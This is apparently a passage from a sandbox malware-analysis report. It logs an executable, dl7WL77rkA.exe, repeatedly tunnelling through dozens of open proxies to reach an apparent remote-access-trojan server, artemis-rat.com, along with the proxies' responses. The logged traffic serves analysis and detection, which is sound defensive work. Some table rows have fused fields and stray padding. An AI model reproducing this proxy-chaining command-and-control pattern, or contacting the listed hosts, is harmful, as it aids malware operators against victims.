Mar 11, 2024 03:30:38.687274933 CET | 327 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
207 | 192.168.2.5 | 50526 | 104.19.79.238 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.472136974 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.626506090 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
208 | 192.168.2.5 | 50401 | 8.219.97.248 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.472137928 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.806983948 CET | 733 | IN | HTTP/1.1 504 Gateway Time-out
Server: Tengine
Date: Mon, 11 Mar 2024 02:30:48 GMT
Content-Type: text/html
Content-Length: 581
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://artemis-rat.com</td></tr><tr><td>Server:</td><td>izt4nf3ws907bcynjqnww8z</td></tr><tr><td>Date:</td><td>2024/03/11 10:30:48</td></tr></table><hr/>Powered by Tengine<hr><center>tengine</center></body></html>
Mar 11, 2024 03:30:49.012470961 CET | 733 | IN | HTTP/1.1 504 Gateway Time-out
Server: Tengine
Date: Mon, 11 Mar 2024 02:30:48 GMT
Content-Type: text/html
Content-Length: 581
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://artemis-rat.com</td></tr><tr><td>Server:</td><td>izt4nf3ws907bcynjqnww8z</td></tr><tr><td>Date:</td><td>2024/03/11 10:30:48</td></tr></table><hr/>Powered by Tengine<hr><center>tengine</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
209 | 192.168.2.5 | 50531 | 203.28.9.107 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.472522974 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.628479004 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
210 | 192.168.2.5 | 50445 | 38.162.1.93 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.473129988 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.894562006 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm=""
Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
Data Ascii: Proxy Authentication Required


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
211 | 192.168.2.5 | 50544 | 104.17.210.9 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.482876062 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.637515068 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
212 | 192.168.2.5 | 50404 | 42.49.148.167 | 9001 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.483267069 CET | 193 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Mar 11, 2024 03:30:38.826827049 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
213 | 192.168.2.5 | 50456 | 184.181.217.220 | 4145 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.492065907 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
214 | 192.168.2.5 | 50441 | 207.180.198.241 | 57327 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.495973110 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.170489073 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
215 | 192.168.2.5 | 50435 | 52.67.10.183 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.496236086 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.822375059 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:38 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
216 | 192.168.2.5 | 50460 | 68.1.210.163 | 4145 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.496788979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
217 | 192.168.2.5 | 50444 | 91.134.140.160 | 16487 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.497637987 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.170476913 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
218 | 192.168.2.5 | 50449 | 35.72.118.126 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.503235102 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.772742987 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:38 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
219 | 192.168.2.5 | 50575 | 172.67.181.136 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.517925024 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.671966076 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
220192.168.2.550573104.18.237.128803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.517940998 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.672633886 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
221192.168.2.55058045.14.174.180803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.521006107 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.675307989 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
222192.168.2.5505063.90.100.1231283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.521009922 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.737607956 CET | 116 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
223192.168.2.550583172.67.182.153803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.524220943 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.678627968 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
224192.168.2.550601104.21.6.88803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.541847944 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.695975065 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
225192.168.2.550405185.191.236.16231283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.541870117 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.342346907 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.942912102 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:30:41.974256039 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
226192.168.2.550763202.159.35.2014433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.546885014 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            227192.168.2.55057247.184.175.16431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.548144102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.278701067 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                                                                                                                                                                                            Server: squid/4.14
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3846
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_DNS_FAIL 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2021 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            228192.168.2.550766202.159.35.2014433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.549994946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            229192.168.2.550537159.65.233.11580003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.550009012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.773946047 CET32INHTTP/1.0 504 Gateway Timeout


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            230192.168.2.550772202.159.35.2014433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.553934097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            231192.168.2.55046661.111.38.5803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.554408073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.860518932 CET507INHTTP/1.1 502 Proxy Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 341
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>Error reading from remote server</strong></p></p></body></html>


